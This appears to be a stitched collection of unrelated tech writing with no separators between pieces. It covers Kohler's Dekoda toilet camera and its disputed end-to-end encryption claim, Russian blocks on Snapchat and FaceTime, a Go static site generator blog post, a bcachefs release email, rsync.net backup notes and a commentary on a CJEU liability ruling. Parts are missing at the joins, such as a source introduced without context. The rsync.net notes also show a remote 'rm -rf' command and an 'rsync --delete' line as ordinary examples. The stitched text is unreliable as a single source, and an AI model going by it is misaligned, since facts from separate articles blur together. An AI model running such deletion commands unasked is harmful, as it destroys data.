Kohler launched its $600 camera to hang on your toilets earlier this year. It’s called Dekoda, and along with the large price tag, the toilet cam also requires a monthly service fee that starts at $6.99. If you want to track the piss and shit of a family of 6, you’ll have to pay $12.99 a month.
What do you get for putting a camera on your toilet? According to Kohler’s pitch , “health & wellness insights” about your gut health and “possible signs of blood in the bowl” as “Dekoda uses advanced sensors to passively analyze your waste in the background.”
If you’re squeamish about sending pictures of the “waste” of your family to Kohler, the company promised that all of the data is “end-to-end encrypted.” The privacy page for the Kohler Health said “user data is encrypted end to end, at rest and in transit” and it’s mentioned several places in the marketing.
It’s not, though. Fondrie-Teitler told 404 Media he started looking into Dekoda after he noticed friends making fun of it in a Slack he’s part of. “I saw the ‘end-to-end encryption’ claim on the homepage, which seemed at odds with what they said they were collecting in the privacy policy,” he said. “Pretty much every other company I've seen implement end-to-end encryption has published a whitepaper alongside it. Which makes sense, the details really matter so telling people what you've done is important to build trust. Plus it's generally a bunch of work so companies want to brag about it. I couldn't find any more details though.”
E2EE has a specific meaning . It’s a type of messaging system that keeps the contents of a message private while in transit, meaning only the person sending and the person receiving a message can view it. Famously, E2EE means that the messaging company itself cannot decode or see the messages (Signal, for example, is E2EE). The point is to protect the privacy of individual users from a company prying into data if a third party, like the government, comes asking for it.
Kohler, it’s clear, has access to a user’s data. This means it’s not E2EE. Fondrie-Teitler told 404 Media that he downloaded the Kohler health app and analyzed the network traffic it sent. “I didn't see anything that would indicate an end-to-end encrypted connection being created,” he said.
Then he reached out to Kohler and had a conversation with its privacy team via email. “The Kohler Health app itself does not share data between users. Data is only shared between the user and Kohler Health,” a member of the privacy team at Kohler told Fondrie-Teitler in an email reviewed by 404 Media. “User data is encrypted at rest, when it’s stored on the user's mobile phone, toilet attachment, and on our systems. Data in transit is also encrypted end-to-end, as it travels between the user's devices and our systems, where it is decrypted and processed to provide our service.”
If Kohler can view the user’s data, as it admits to doing in this email exchange with Fondrie-Teitler, then it’s not—by definition—using E2EE. Kohler did not immediately respond to 404 Media’s request for comment.
“I'd like the term ‘end-to-end encryption’ to not get watered down to just meaning ‘uses https’ so I wanted to see if I could confirm what it was actually doing and let people know,” Fondrie-Teitler told 404 Media. He pointed out that Zoom once made a similar claim and had to pay a fine to the FTC because of it.
“I think everyone has a right to privacy, and in order for that to be realized people need to have an understanding of what's happening with their data,” Fondrie-Teitler said. “It's already so hard for non-technical individuals (and even tech experts) to evaluate the privacy and security of the software and devices they're using. E2EE doesn't guarantee privacy or security, but it's a non-trivial positive signal and losing that will only make it harder for people to maintain control over their data.”
About the author
Matthew Gault is a writer covering weird tech, nuclear war, and video games. He’s worked for Reuters, Motherboard, and the New York Times.
Russian authorities blocked access to Snapchat and imposed restrictions on Apple’s video calling service, FaceTime, the latest step in an effort to tighten control over the internet and communications online, according to state-run news agencies and the country’s communications regulator.
The state internet regulator Roskomnadzor alleged in a statement that both apps were being “used to organize and conduct terrorist activities on the territory of the country, to recruit perpetrators [and] commit fraud and other crimes against our citizens”. Apple did not respond to an emailed request for comment, nor did Snap Inc.
The Russian regulator said it took action against Snapchat on 10 October, even though it only reported the move on Thursday. The moves follow restrictions against Google’s YouTube, Meta’s WhatsApp and Instagram, and the Telegram messaging service, itself founded by a Russian-born man, that came in the wake of Vladimir Putin’s invasion of Ukraine in 2022.
Under Vladimir Putin, authorities have engaged in deliberate and multi-pronged efforts to rein in the internet. They have adopted restrictive laws and banned websites and platforms that don’t comply. Technology has also been perfected to monitor and manipulate online traffic.
Access to YouTube was disrupted last year in what experts called deliberate throttling of the widely popular site by the authorities. The Kremlin blamed YouTube owner Google for not properly maintaining its hardware in Russia.
While it’s still possible to circumvent some of the restrictions by using virtual private network services, those are routinely blocked, too.
Authorities further restricted internet access this summer with widespread shutdowns of cellphone internet connections. Officials have insisted the measure was needed to thwart Ukrainian drone attacks, but experts argued it was another step to tighten internet control. In dozens of regions, “white lists” of government-approved sites and services that are supposed to function despite a shutdown have been introduced.
The government has also acted against popular messaging platforms. The encrypted messenger Signal and another popular app, Viber, were blocked in 2024. This year, authorities banned calls via WhatsApp, the most popular messaging app in Russia, and Telegram, a close second. Roskomnadzor justified the measure by saying the two apps were being used for criminal activities.
At the same time, authorities actively promoted a “national” messenger app called Max, which critics see as a surveillance tool. The platform, touted by developers and officials as a one-stop shop for messaging, online government services, making payments and more, openly declares it will share user data with authorities upon request. Experts also say it does not use end-to-end encryption.
Earlier this week, the government also said it was blocking Roblox, a popular online game platform, saying the step aimed at protecting children from illicit content and “pedophiles who meet minors directly in the game’s chats and then move on to real life”. Roblox in October was the second most popular game platform in Russia, with nearly 8 million monthly users, according to the media monitoring group Mediascope.
after newsletter promotion
Stanislav Seleznev, cyber security expert and lawyer with the Net Freedom rights group, said that Russian law views any platform where users can message each other as “organizers of dissemination of information”.
This label mandates that platforms have an account with Roskomnadzor so that it could communicate its demands, and give Russia’s security service, the FSB, access to accounts of their users for monitoring; those failing to comply are in violation and can get blocked, Seleznev said.
Seleznev estimated that possibly tens of millions of Russians have been using FaceTime, especially after calls were banned on WhatsApp and Telegram. He called the restrictions against the service “predictable” and warned that other sites failing to cooperate with Roskomnadzor “will be blocked – that’s obvious”.
I stumbled across the refactoring english book this summer. This got me motivated to try (technical) writing myself. However, I needed a simple way to publish blog posts and an excuse why I can't start writing immediatly. So me being in developer mode, I told myself:
"First things first, instead of practicing my writing, reading the book or sketching drafts of what I actually could write about, start with a custom static site generator."
But this now became the first article here on nobloat.org and I like it.
This blog is generated by 400 lines of handwritten go code , mainly because it is fun, but also because I was annoyed by all the breaking changes with each update of existing solutions.
This can't happen anymore :)
The static site generator ecosystem is vast , but most solutions come with significant complexity. From a writing perspective, the biggest issue was infact getting a setup that works without distraction and looks good to me .
Hugo is fast and popular and I have used it in the past already. But, it's a massive framework with hundreds of features I'd never use but still have to pay for in complexity tokens . The configuration files, theme system, and plugin ecosystem add layers of abstraction that make it hard to understand what's actually happening. When something breaks or I want to customize behavior, it is too complex for me to reason about all this. And I have had issues in the past where untouched static websites suddenly would no longer build after one or two years.
Jekyll requires Ruby, Bundler, and a complex gem ecosystem. Every time I'd want to update or deploy, I'd need to ensure the right Ruby version, manage gem dependencies, and deal with potential version conflicts. The overhead of maintaining a Ruby environment just to generate static HTML felt excessive. The same issue applies to Pelican just with Python instead of Ruby
Next.js and other React-based static site generators are powerful, but they bring the entire JavaScript ecosystem with them. Node modules, build tools, transpilation, and the constant churn of the npm ecosystem—all for what is essentially text processing and template rendering.
Even simpler tools like Zola or 11ty still require learning their specific conventions, configuration formats, and template languages. They're better than the heavyweights, but they're still frameworks with their own abstractions.
What I needed was:
None of the existing solutions met these requirements. They either required complex setup, had too many dependencies, introduced unnecessary abstractions, or were too opinionated about structure. Plus this might be a fun project for a sunny afternoon in the park.
The implementation consists of two Go files:
main.go
(core functionality) and
data.go
(site configuration), with no external dependencies beyond the standard library. It reads Markdown files, converts them to HTML, generates an index page, creates an RSS feed, and outputs everything to a
public/
directory. The entire codebase is
under 400 lines
and does exactly what I need, nothing more.
The blog generator follows a simple workflow:
Posts are Markdown files in the
articles/
directory, named with a date prefix:
YYYY-MM-DD-title.md
. The date prefix serves two purposes: it provides the publication date for sorting and RSS feeds, and it makes chronological organization obvious when browsing files.
articles/
2025-07-01-hello-blog.md
2025-12-03-x-platform-translation-system.md
The first line of each Markdown file is treated as the title (a
# Heading
), and the rest is converted to HTML content.
The markdown parser is intentionally minimal. It handles:
#
,
##
,
###
)
- item
)
code
, links, images)
##
headings
The parser steps through each line of the markdown file and converts the supported expressions into HTML. For lists and code blocks it keeps track whether it is still inside a
list
or
code
snippet.
The code snippet is a bit shortened to only show the relevant parts.
func parseMarkdown(input string) (content string, title string) {
lines := strings.Split(input, "\n")
var out strings.Builder
inList := false
inCode := false
codeLang := ""
if len(lines) > 0 && strings.HasPrefix(lines[0], "# ") {
title = strings.TrimPrefix(lines[0], "# ")
}
for _, raw := range lines {
line := strings.TrimSpace(raw)
if strings.HasPrefix(line, "```") {
if inCode {
out.WriteString("</code></pre>\n</div>\n")
inCode = false
continue
}
inCode = true
codeLang = strings.TrimSpace(strings.TrimPrefix(line, "```"))
if codeLang == "" {
out.WriteString("<pre><code>")
} else {
out.WriteString(fmt.Sprintf("<pre><code class=\"language-%s\">", codeLang))
}
continue
}
if inCode {
out.WriteString(html.EscapeString(raw) + "\n")
continue
}
if inList && line == "" {
out.WriteString("</ul>\n")
inList = false
continue
}
switch {
case strings.HasPrefix(line, "> "):
if inList {
out.WriteString("</ul>\n")
inList = false
}
quote := formatInline(strings.TrimPrefix(line, "> "))
out.WriteString("<blockquote><p>" + quote + "</p></blockquote>\n")
case strings.HasPrefix(line, "# "):
if inList {
out.WriteString("</ul>\n")
inList = false
}
heading := formatInline(strings.TrimPrefix(line, "# "))
out.WriteString("<h1>" + heading + "</h1>\n")
case strings.HasPrefix(line, "- "):
if !inList {
out.WriteString("<ul>\n")
inList = true
}
item := formatInline(strings.TrimPrefix(line, "- "))
out.WriteString("<li>" + item + "</li>\n")
case line == "":
if inList {
out.WriteString("</ul>\n")
inList = false
}
default:
if inList {
out.WriteString("</ul>\n")
inList = false
}
out.WriteString("<p>" + formatInline(line) + "</p>\n")
}
}
if inList {
out.WriteString("</ul>\n")
}
if inCode {
out.WriteString("</code></pre>\n</div>\n")
}
return out.String(), title
}
The
loadPosts()
function scans the articles directory, reads each
.md
file, parses the date from the filename prefix, converts Markdown to HTML, and sorts posts by date in descending order (newest first).
func loadPosts(dir string) []Post {
files, _ := os.ReadDir(dir)
var posts []Post
for _, f := range files {
if strings.HasSuffix(f.Name(), ".md") {
// Parse date from filename: YYYY-MM-DD-title.md
dateStr := f.Name()[:10]
postDate, err := time.Parse("2006-01-02", dateStr)
// Convert markdown to HTML
}
}
// Sort by date, newest first
sort.Slice(posts, func(i, j int) bool {
return posts[i].Date.After(posts[j].Date)
})
return posts
}
If a file doesn't match the expected format, it logs a warning and skips it, ensuring only properly formatted posts are included.
The generator creates three types of HTML:
Index Page
(
index.html
): Lists all posts with links, plus a links section for external resources.
Post Pages
(
YYYY-MM-DD-title.html
): Individual post pages with navigation back to the index.
RSS Feed
(
feed.xml
): Standard Atom feed for RSS readers.
All HTML is generated using Go's
html/template
package, which is part of the standard library. Templates are read from simple HTML files (
index.html
and
article.html
) that use Go's template syntax—no complex template system, just straightforward HTML with template variables.
Site metadata is stored in
data.go
as a simple Go struct. This includes the site title, slogan, base URL, links, projects, and tools that appear on the index page. The configuration is just a variable declaration, hence no YAML, no JSON, no complex config parsing.
To change the site title or add a link, I just edit
data.go
directly.
var config = Config{
Title: "][ nobloat.org",
Slogan: "pragmatic software minimalism",
BaseURL: "https://nobloat.org",
Links: map[string]string{
"Choosing boring technology": "https://boringtechnology.club/",
// ...
},
// ...
}
For development, the
main.go
includes a
--watch
flag that uses the
fsnotify
package to monitor the articles directory, CSS file, template files, and the generator itself. When any file changes, it automatically rebuilds the site.
When you modify content, templates, or CSS, changes are detected immediately and the site rebuilds automatically. Edit a post, see it update. Modify the HTML templates, get instant feedback. Change the stylesheet, see the new styles applied.
It does however not detect changes to the
*.go
files itself, because it would require a little more complex restart mechanism and I rarely touch them anyway.
This is the only external dependency ( github.com/fsnotify/fsnotify ), and it's only needed for the watch feature. The core build functionality requires no external packages.
This blog generator does exactly what I need: converts Markdown to HTML, generates an index and RSS feed, and outputs static files. It's under 400 lines of code , uses only the go standard library for core functionality, and I understand every part of it.
It might not be suitable for someone who needs complex features like tags, categories, pagination, or theme systems. But for a simple blog, it's perfect. It fits the "nobloat" philosophy .
The entire codebase is very small, making it easy to read, modify, and maintain.
And the best part for me personally: I don't need
node
,
npm
or similar tools to build this. Local preview is just opening the
public/index.html
in
firefox
. Deployment is just an
rsync -av --delete public/ user@host:html/blog/
I do have a few ideas of further topics to write about the context of nobloat . Taking the courage to publish this was the biggest step for me.
Feeback is always welcome to dev@spiessknafl.at
From: Kent Overstreet <kent.overstreet@linux.dev> To: linux-bcachefs@vger.kernel.org Subject: bcachefs 1.33.0 - reconcile Date: Thu, 4 Dec 2025 12:35:59 -0500 [thread overview] Message-ID: <slvis5ybvo7ch3vxh5yb6turapyq7hai2tddwjriicfxqivnpn@xdpb25wey5xd> (raw) Biggest new feature in the past ~2 years, I believe. The user facing stuff may be short and sweet - but so much going on under the hood to make all this smooth and polished. Big thank you to everyone who helped out with testing, design feedback, and more. As always, keep the bug reports coming - you find 'em, we fix em :) Cheers, Kent Changelog: ========== `bcachefs_metadata_version_reconcile` (formerly known as rebalance_v2) ### Reconcile An incompatible upgrade is required to enable reconcile. Reconcile now handles all IO path options; previously only the background target and background compression options were handled. Reconcile can now process metadata (moving it to the correct target, rereplicating degraded metadata); previously rebalance was only able to handle user data. Reconcile now automatically reacts to option changes and device setting changes, and immediately rereplicates degraded data or metadata This obsoletes the commands `data rereplicate`, `data job drop_extra_replicas`, and others; the new commands are `reconcile status` and `reconcile wait`. The recovery pass `check_reconcile_work` now checks that data matches the specified IO path options, and flags an error if it does not (if it wasn't due to an option change that hasn't yet been propagated). Additional improvements over rebalance and implementation notes: We now have a separate index for data that's scheduled to be processed by reconcile but can't (e.g. because the specified target is full), `BTREE_ID_reconcile_pending`; this solves long standing reports of rebalance spinning when a filesystem has more data than fits on the specified background target. This also means you can create a single device filesystem with replicas=2, and upon adding a new device data will automatically be replicated on the new device, no additional user intervention required. There's a separate index for "high priority" reconcile processing - `BTREE_ID_reconcile_hipri`. This is used for degraded extents that need to be rereplicated; they'll be processed ahead of other work. Rotating disks get special handling. We now track whether a disk is rotational (a hard drive, instead of an SSD); pending work on those disks is additionally indexed in the `BTREE_ID_reconcile_work_phys` and `BTREE_ID_reconcile_hipri_phys` btrees so they can be processed in physical LBA order, not logical key order, avoiding unnecessary seeks. We don't yet have the ability to change the rotational setting on an existing device, once it's been set; if you discover you need this, please let us know so it can be bumped up on the list (it'll be a medium sized project). `BCH_MEMBER_STATE_failed` has been renamed to `BCH_MEMBER_STATE_evacuating`; as the name implies, reconcile automatically moves data off of devices in the evacuating state. In the future, when we have better tracking and monitoring of drive health, we'll be able to automatically mark failing devices as evacuating: when this lands, you'll be able to load up a server with disks and walk away - come back a year later to swap out the ones that have been failed. Reconcile was a massive project: the short and simple user interface is deceptive, there was an enormous amount of work under the hood to make everything work consistently and handle all the special cases we've learned about over the past few years with rebalance. There's still reconcile-related work to be done on disk space accounting when devices are read-only or evacuating, and in the future we want to reserve space up front on option change, so that we can alert the user if they might be doing something they don't have disk space for. ### Other improvements and changes: - Degraded data is now always properly reported as degraded (by `bcachefs fs usage`); data is considered degraded any time the durability on good (non-evacuating devices) is less than the specified replication level. - Counters (shown by `bcachefs fs top` and tracepoints have gotten a giant cleanup and rework: every counter has a corresponding tracepoint. This makes it easy to drill down and investigate when a filesystem is doing something unusual and unexpected. Under the hood, the conversion of tracepoints to printbufs/pretty printers has now been completed, with some much improved helpers. This makes it much easier to add new counters and tracepoints or add additional info to existing tracepoints, typically a 5-20 line patch. If there's something you're investigating and you need more info, just ask. We now make use of type information on counters to display data rates in `bcachefs fs top` where applicable, and many counters have been converted to data rates. This makes it much easier to correlate different counters (e.g. `data_update`, `data_update_fail`) to check if the rates of slowpath events should be a cause for concern. - Logging/error message improvements Logging has been a major area of focus, with a lot of under the hood improvements to make it ergonomic to generate messages that clearly explain what the system is doing an why: error messages should not include just the error, but how it was handled (soft error or hard error) and all actions taken to correct the error (e.g. scheduling self healing or recovery passes). When we receive an IO error from the block layer we now report the specific error code we received (e.g. `BLK_STS_IOERR`, `BLK_STS_INVAL`). The various write paths (user data, btree, journal) now report one error message for the entire operation that includes all the sub-errors for the individual replicated writes and the status of the overall operation (soft error (wrote degraded data) vs. hard error), like the read paths. On failure to mount due to insufficient devices, we now report which device(s) were missing; we remember the device name and model in the superblock from the last time we saw it so that we can give helpful hints to the user about what's missing. When btree topology repair recovers via btree node scan, we now report which node(s) it was able to recover via scan; this helps with determining if data was actually lost or not. We now ratelimit soft and hard errors separately, in the data/journal/btree read and write paths, ensuring that if the system is being flooded with soft errors the hard errors will still be reported. All error ratelimiting now obeys the `no_ratelimit_errors` option. All recovery passes should now have progress indicators. - New options: `mount_trusts_udev`: there have been reports of mounting by UUID failing due to known bugs in libblkid. Previously this was available as an environment variable, but it now may be specified as a mount option (where it should also be much easier to find). When specified, we only use udev for getting the list of the system's block devices; we do all the probing for filesystem members ourself. `writeback_timeout`: if set, this overrides the `vm.dirty_writeback*` sysctls for the given filesystem, and may be set persistently. Useful for setting a lower writeback timeout for removeable media. - Other smaller user-visible improvements The `mi_btree_bitmap` field in the member info section of the superblock now has a recovery pass to clean it up and shrink it; it will be automatically scheduled when we notice that there is significantly more space on a device marked as containing metadata than we have metadata on that device. The member-info btree bitmap is used by btree node scan, for disaster recovery repair; shrinking the bitmap reduces the amount of the device that has to be scanned if we have to recover from btree nodes that have become unreadable or lost despite replication. You don't ever want to need it, but if you do need it it's there. - Promotes are now ratelimited; this resolves an issue with spinning up far too many kworker threads for promotes that wouldn't happen due to the target being busy. - An issue was spotted on a user filesystem where btree node merging wasn't happening properly on the `reconcile_work` btree, causing a very slow upgrade. Btree node merging has now seen some improvements; btree lookups can now kick off asynchronous btree node merges when they spot an empty btree node, and the btree write buffer now does btree merging asynchronously, which should be a noticeable improvement on system performance under heavy load for some users - btree write buffer flushing is single threaded and can be a bottleneck. There's also a new recovery pass, `merge_btree_nodes`, to check all btrees for nodes that can be merged. It's not run automatically, but can be run if desired by passing the `recovery_passes` option to an online fsck. - And many other bug fixes. ### Notable under-the-hood codebase work: A lot of codebase modernization has been happening over the past six months, to prepare for Rust. With the latest features recently available in C and in the kernel, we can now do incremental refactorings to bring code steadily more in line with what the Rust version will be, so that the future conversion will be mostly syntactic - and not a rewrite. The big enabler here was CLASS(), which is the kernel's version of pseudo-RAII based on `__cleanup()`; this allows for the removal of goto based error handling (Rust notably does not have goto). We're now down to ~600 gotos in the entire codebase, down from ~2500 when the modernization started, with many files being complete. Other work includes avoiding open coded vectors; bcachefs uses DARRAY(), which is decently close to Rust/C++ vectors, and the try() macro for forwarding errors, stolen from Rust. These cleanups have deleted thousands of lines from the codebase over the past months.
reply other threads:[~2025-12-04 17:36 UTC|newest] Thread overview: [no followups] expand[flat|nested] mbox.gz Atom feed
Reply instructions: You may reply publicly to this message via plain-text email using any one of the following methods: * Save the following mbox file, import it into your mail client, and reply-to-all from there: mbox Avoid top-posting and favor interleaved quoting: https://en.wikipedia.org/wiki/Posting_style#Interleaved_style * Reply using the --to, --cc, and --in-reply-to switches of git-send-email(1): git send-email \ --in-reply-to=slvis5ybvo7ch3vxh5yb6turapyq7hai2tddwjriicfxqivnpn@xdpb25wey5xd \ --to=kent.overstreet@linux.dev \ --cc=linux-bcachefs@vger.kernel.org \ /path/to/YOUR_REPLY https://kernel.org/pub/software/scm/git/docs/git-send-email.html * If your mail client supports setting the In-Reply-To header via mailto: links, try the mailto: linkBe sure your reply has a Subject: header at the top and a blank line before the message body.
This is a public inbox, see mirroring instructions for how to clone and mirror all data and code used for this inbox; as well as URLs for NNTP newsgroup(s).
Append-Only Backups with rclone serve restic --stdio
rsync.net users may run unix commands, remotely, over SSH like this:
ssh user@rsync.net md5 some/file
or:
ssh user@rsync.net rm -rf some/file
There is a restricted set of commands that are able to be run and because customer filesystems are mounted noexec,nosuid it is not possible to run commands that customers upload.
However, as an added defense, we also have an arguments firewall wherein we explicitly allow only specific arguments to be specified for each allowed command.
Since the inclusion of the 'rclone' command on our platform we have very intentionally disallowed the "serve" argument as we have no intention of allowing customers to run persistent processes or open sockets, answer other protocols, etc.
However ...
A number of customers, most notably Michael Alyn Miller, pointed out that the 'rclone serve restic' workflow has a --stdio modifier that causes the "serve" functions to happen over stdio without opening network sockets or spawning server processes, etc., and enables this very particular command to be run:
rclone serve restic --stdio
... which is interesting because this gives us an encrypted "append only" workflow using restic ... which is built into rclone ... which is built into our platform[1].
This is accomplished by creating a specific SSH key just for these append-only backups . This key is placed in the ~/.ssh/authorized_keys file inside your rsync.net account with a command restriction:
restrict,command="rclone serve restic --stdio --append-only path/path/repo" ssh-ed25519 JHWGSFDEaC1lZDIUUBVVSSDAIE1P3GjIRpxxFjjsww2nx3mcnwwebwLk ....
... which means that logins occurring with that SSH key may not run any other command than this very specific one that not only specifies --append-only but the specific repository to work on.
You will also need to create a second SSH key with no command restrictions - you'll see why as we continue below ...
On the client end (your end) you would perform an append-only backup like this:
First, initialize a restic repository in your rsync.net account using the normal SSH key that has no command restrictions :
restic -r sftp:user@rsync.net:path/repo init
enter password for new repository:
enter password again:
Enter passphrase for key '/home/user/.ssh/admin_key':
created restic repository 149666wedd at sftp:user@rsync.net:path/repo
Please note that knowledge of your password is required to access
the repository. Losing your password means that your data is
irrecoverably lost.
Second, perform a backup of /YOUR/SOURCE/DATA to this newly initialized repository:
restic -o rclone.program="ssh -i ~/.ssh/id_rsa2 user@rsync.net rclone" -o rclone.args="serve restic --stdio --append-only" --repo rclone:path/repo backup /YOUR/SOURCE/DATA
enter password for repository:
repository 149666wedd opened successfully, password is correct
created new cache in path/repo/.cache/restic
no parent snapshot found, will read all files
Files: 2112 new, 0 changed, 0 unmodified
Dirs: 303 new, 0 changed, 0 unmodified
Added to the repo: 869.197 MiB
processed 2114 files, 1600.575 MiB in 1:01
snapshot dnn0629f saved
You now have your first snapshot. Let's add a file, change some files, delete a file, and then do another backup:
restic -o rclone.program="ssh -i ~/.ssh/id_rsa2 user@rsync.net rclone" -o rclone.args="serve restic --stdio --append-only" --repo rclone:path/repo backup /YOUR/SOURCE/DATA
enter password for repository:
repository 149666wedd opened successfully, password is correct
using parent snapshot dnn0629f
Files: 1 new, 1 changed, 2110 unmodified
Dirs: 0 new, 3 changed, 82 unmodified
Added to the repo: 615.911 MiB
processed 2114 files, 1.160 GiB in 0:01
snapshot a39b6628 saved
We have created a repository, uploaded data to it, and refreshed it with new data.
Now let's verify that we can see the snapshots we've created:
restic -o rclone.program="ssh -i ~/.ssh/id_rsa2 user@rsync.net rclone" -o rclone.args="serve restic --stdio --append-only" --repo rclone:path/repo list snapshots
enter password for repository:
repository 149666wedd opened successfully, password is correct
ijnssb337c4423013b69ed833fc5514ca010160nbss223h95122fcb22h361tt7
snBSGw23hBBSj2k23d055723b2336caajsnnww23b3cc16cf88838f085bbww1kv
Finally, let's prove to ourselves that the repository is, indeed, append-only:
restic -o rclone.program="ssh -i ~/.ssh/id_rsa2 user@rsync.net rclone" -o rclone.args="serve restic --stdio --append-only" --repo rclone:path/repo forget --keep-last 1
repository 149666wedd opened successfully, password is correct
Applying Policy: keep 1 latest snapshots
keep 1 snapshots:
ID Time Host Tags Reasons Paths
-----------------------------------------------------------------------------------------
a39b6628 2025-03-29 20:10:44 hostname last snapshot /YOUR/SOURCE/DATA
-----------------------------------------------------------------------------------------
1 snapshots
remove 1 snapshots:
ID Time Host Tags Paths
--------------------------------------------------------------------------
dnn0629f 2025-03-29 20:09:54 hostname /YOUR/SOURCE/DATA
--------------------------------------------------------------------------
1 snapshots
Remove(
What we have accomplished is a remote, encrypted backup (using restic) that can only be accessed by one of two SSH keys - a "normal" SSH key that has full control over the rsync.net account and can read/write/delete arbitrarily and a second "append-only" SSH key that cannot do anything at all except call rclone, specifically to run restic, and even more specifically in append-only mode .
This arrangement only makes sense if you keep the "normal" SSH key out of, and way from, whatever system is running these automated backups. The system that runs the backups should only have the append-only key. This way, if an attacker gains control of the source system they cannot abuse the backup configuration to destroy your remote backups at rsync.net.
[1] The restic binary is not installed on our platform and the correct way for rsync.net users to use "plain old restic" is to run it over SFTP with their rsync.net account as the SFTP endpoint.
ZFS vdev rebalancing
Let's pretend that you have a zpool with four vdevs, each of which are 90% full.
If you add a fifth vdev to this zpool, ZFS will tend to balance all new writes across all five vdevs which is a strategy that maximizes performance.
Unfortunately, if you continue to write data to this pool the first four vdevs will eventually reach 95 - 96 percent full, while the new, fifth vdev is only 5-6% full, and switch allocation strategies to "best fit" and start writing most (almost all) writes to only the new vdev.
Which is to say: your 5-vdev pool will have increased performance due to the addition of the 5th vdev for only a very short time. After that, performance will degrade markedly as you write to only the new vdev. The original four vdevs are effectively full.
One way to manage this scenario is to set a write threshold with this sysctl:
vfs.zfs.mg.noalloc_threshold
... and copy data from this zpool to itself .
For instance:
Wait for a period of light (or no) activity when you know you will be the only one writing any significant data to the pool.
Set the 'vfs.zfs.mg.noalloc_threshold' sysctl to something just above the percentage full of your existing vdevs ... in this case, if the existing vdevs are 90% full, we will attempt to grow them by 2% each, and so we will set the sysctl to '8':
# sysctl -w vfs.zfs.mg.noalloc_threshold=8
... which means that at 8% free (92% full) these vdevs will stop accepting new written data.
Now find 10 TB of data on this zpool to copy (not move) back to itself.
(or, alternatively, find a 10TB dataset to 'zfs send' back to itself)
When this 10 TB of data is written to the pool it will be distributed evenly across all five vdevs.
Further, when you delete the source data (or dataset) you will be removing 2.5TB of data from each of the original vdevs which was replaced with only 2TB.
All future reads and writes of this data will now occur from five vdevs rather than four, thus increasing performance. You are, effectively, defragmenting the pool.
In this hypothetical situation our four original vdevs are now 89.5% full which means you could leave the sysctl set at '8' but this time choose a 12.5TB dataset or collection of files and copy/send that back to itself.
The condition we are trying to avoid is one where our rebalancing of data, along with other variables - or activity - on the system causes one of the existing vdevs to fill up to 95-96% at which time it will effectively stop accepting new writes.
By locking the fullness threshold with this sysctl, we can make sure we are rebalancing onto all five vdevs evenly and not overloading any one of them.
If you repeat the above procedure a few times you will achieve a manually rebalanced - and defragmented - zpool. New data will tend to write across all five vdevs and all of the data that you manually rebalanced will be newly spread across all five vdevs.
borg mount syntax
You can remotely mount a borg repo stored in your rsync.net account to a local mountpoint:
borg mount --remote-path=borg14 user@rsync.net:path/path/repo/ /mnt/borg
This will mount the remote borg repository, locally, in /mnt/borg. It will be mounted as a borgfs device of type "fuse".
This borg mount is read-only by default.
This HOWTO has some interesting workflows for 'borg mount' like mounting multiple repositories with a 'for' loop and 'diff'ing different mounted repositories, etc.
More Information
rsync.net publishes a wide array of support documents as well as a FAQ
rsync.net has been tested, reviewed and discussed in a variety of venues .
You, or your CEO, may find our CEO Page useful.
Please see our HIPAA , GDPR , and Sarbanes-Oxley compliance statements.
Contact info@rsync.net for more information, and answers to your questions.
The Court of Justice of the EU—likely without realizing it—just completely shit the bed and made it effectively impossible to run any website in the entirety of the EU that hosts user-generated content.
Obviously, for decades now, we’ve been talking about issues related to intermediary liability, and what standards are appropriate there. I am an unabashed supporter of the US’s approach with Section 230, as it was initially interpreted, which said that any liability should land on the party who contributed the actual violative behavior—in nearly all cases the speaker , not the host of the content.
The EU has always held itself to a lower standard of intermediary liability, first with the E-Commerce Directive and more recently with the Digital Services Act (DSA), which still generally tries to put more liability on the speaker but has some ways of shifting the liability to the platform.
No matter which of those approaches you think is preferable, I don’t think anyone could (or should) favor what the Court of Justice of the EU came down with earlier this week, which is basically “fuck all this shit, if there’s any content at all on your site that includes personal data of someone you may be liable.”
As with so many legal clusterfucks, this one stems from a case with bad facts, which then leads to bad law. You can read the summary as the CJEU puts it:
The applicant in the main proceedings claims that, on 1 August 2018, an unidentified third party published on that website an untrue and harmful advertisement presenting her as offering sexual services. That advertisement contained photographs of that applicant, which had been used without her consent, along with her telephone number. The advertisement was subsequently reproduced identically on other websites containing advertising content, where it was posted online with the indication of the original source. When contacted by the applicant in the main proceedings, Russmedia Digital removed the advertisement from its website less than one hour after receiving that request. The same advertisement nevertheless remains available on other websites which have reproduced it.
And, yes, no one is denying that this absolutely sucks for the victim in this case. But if there’s any legal recourse, it seems like it should be on whoever created and posted that fake ad. Instead, the CJEU finds that Russmedia is liable for it, even though they responded within an hour and took down the ad as soon as they found out about it.
The lower courts went back and forth on this, with a Romanian tribunal (on first appeal) finding, properly, that there’s no fucking way Russmedia should be held liable, seeing as it was merely hosting the ad and had nothing to do with its creation:
The Tribunalul Specializat Cluj (Specialised Court, Cluj, Romania) upheld that appeal, holding that the action brought by the applicant in the main proceedings was unfounded, since the advertisement at issue in the main proceedings did not originate from Russmedia, which merely provided a hosting service for that advertisement, without being actively involved in its content. Accordingly, the exemption from liability provided for in Article 14(1)(b) of Law No 365/2002 would be applicable to it. As regards the processing of personal data, that court held that an information society services provider was not required to check the information which it transmits or actively to seek data relating to apparently unlawful activities or information. In that regard, it held that Russmedia could not be criticised for failing to take measures to prevent the online distribution of the defamatory advertisement at issue in the main proceedings, given that it had rapidly removed that advertisement at the request of the applicant in the main proceedings.
With the case sent up to the CJEU, things get totally twisted, as they argue that under the GDPR, the inclusion of “sensitive personal data” in the ad suddenly makes the host a “joint controller” of the data under that law. As a controller of data, the much stricter GDPR rules on data protection now apply, and the more careful calibration of intermediary liability rules get tossed right out the window.
And out the window, right with it, is the ability to have a functioning open internet.
The court basically shreds basic intermediary liability principles here:
In any event, the operator of an online marketplace cannot avoid its liability, as controller of personal data, on the ground that it has not itself determined the content of the advertisement at issue published on that marketplace. Indeed, to exclude such an operator from the definition of ‘controller’ on that ground alone would be contrary not only to the clear wording, but also the objective, of Article 4(7) of the GDPR, which is to ensure effective and complete protection of data subjects by means of a broad definition of the concept of ‘controller’.
Under this ruling, it appears that any website that hosts any user-generated content can be strictly liable if any of that content contains “sensitive personal data” about any person. But how the fuck are they supposed to handle that?
The basic answer is to pre-scan any user-generated content for anything that might later be deemed to be sensitive personal data and make sure it doesn’t get posted.
How would a platform do that?
¯\_(ツ)_/¯
There is no way that this is even remotely possible for any platform, no matter how large or how small. And it’s even worse than that. As intermediary liability expert Daphne Keller explains :
The Court said the host has to
- pre-check posts (i.e. do general monitoring)
- know who the posting user is (i.e. no anonymous speech)
- try to make sure the posts don’t get copied by third parties (um, like web search engines??)
